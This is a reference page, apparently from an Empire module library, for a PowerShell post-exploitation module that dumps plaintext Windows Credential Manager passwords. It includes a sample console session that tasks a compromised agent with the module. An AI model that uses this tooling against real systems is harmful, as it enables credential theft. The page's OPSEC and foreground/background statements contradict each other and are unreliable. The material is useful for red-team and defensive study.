Enum_cred_store - Empire Module


This page contains detailed information about how to use the powershell/credentials/enum_cred_store Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: enum_cred_store
Module: powershell/credentials/enum_cred_store
Source code [1]: empire/server/modules/powershell/credentials/enum_cred_store.yaml
Source code [2]: empire/server/data/module_source/credentials/dumpCredStore.ps1
MITRE ATT&CK: T1003
Language: PowerShell
Needs admin: No
OPSEC safe: Yes
Background: Yes

The enum_cred_store module dumps plaintext credentials from the Windows Credential Manager for the current interactive user.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the enum_cred_store module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the enum_cred_store module:

Agent
Agent to run module on.

Enum_cred_store Example Usage


Here's an example of how to use the enum_cred_store module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/credentials/enum_cred_store

 Author       BeetleChunks                                                        
 Background   True                                                                
 Comments     https://gallery.technet.microsoft.com/scriptcenter/PowerShell-      
              Credentials-d44c3cde'                                               
 Description  Dumps plaintext credentials from the Windows Credential Manager for 
              the current interactive user.                                       
 Language     powershell                                                          
 Name         powershell/credentials/enum_cred_store                              
 NeedsAdmin   False                                                               
 OpsecSafe    True                                                                
 Techniques   http://attack.mitre.org/techniques/T1003                            


,Record Options-,----------,-------------------------,
| Name  | Value | Required | Description             |
|-------|-------|----------|-------------------------|
| Agent |       | True     | Agent to run module on. |
'-------'-------'----------'-------------------------'

(Empire: usemodule/powershell/credentials/enum_cred_store) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/credentials/enum_cred_store) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author


  • BeetleChunks

References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.